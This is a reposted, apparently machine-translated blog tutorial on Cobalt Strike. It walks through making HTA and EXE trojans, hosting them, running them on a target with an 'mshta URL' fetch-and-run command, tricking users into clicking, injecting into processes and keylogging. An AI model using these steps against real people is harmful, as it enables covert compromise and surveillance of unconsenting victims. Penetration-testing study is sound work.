Penetration Testing Tools (1) CS

Enterprise 2023-07-11 23:54:07 views: null

1. Penetration testing tools

一、CobaltStrike

Abbreviated as CS. Based on the distributed structure, it can realize the work of a single person or a team. Easy to use. (It has good support for the windows operating system, but for the Linux system, an additional plug-in needs to be added)
Click to enter the download address

Initiation and application of CS

This CS is started based on the Linux system, you need to download CS in the Linux system, it is better to download version 4.5 or above, which is more friendly.

1. Start the client
and use the cd command to enter the CS folder.
Enter the command sudo ./teamserver ip password
ip to customize the password for your computer IP password

2. Start the client connection
and then open a command line window, enter the CS folder, enter

sudo ./cobaltstrike
A login window will appear, enter the password you just defined to enter.

3. Production of Trojan horse program:

Two forms of Trojans: HTA EXE

HTA

1. Create a listener:

It is used to perform monitoring related operations after connecting to the target machine.

Cobalt Strike ->Listeners->Create listener name

2. Create a Trojan horse program HTA

The full name of HTA is called HTML Application, a malicious HTML application

When creating an HTA, pass in the previously created listener and save it locally.

Attacks->Packages->HTML Application

3. File hosting

Host the HTA as a file and generate a URL

Attacks->Web Drive-by->Host File

4. URLs can be injected into other people's command line windows

mshta URL

If the mshta command is restricted from input, it can be bypassed.

EXE

1. Create an EXE Trojan program

attack->packages->E, then put it into the listener, and select the output format of windows EXE

As long as the target computer clicks on the exe file, it will be monitored.

2. Delivery method

method of force,

stealthily,

Induce users to click to download by carrying http service

3. Loading into other applications

After monitoring the computer, right-click -> Explore-> port scan

Open all used ports to piggyback Trojans into other programs

Click a port, how to click the inject button to inject, and you can get the monitoring of this program,

Then you can click Log Keystrokes (keyboard recording), and then click view->key, and the keylogging window will pop up. When the target computer keyboard is used, the window will record the keys pressed.

4. Port scanning

Can scan out all IP addresses in the LAN

Guess you like

Origin blog.csdn.net/love_wgll/article/details/129212782
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com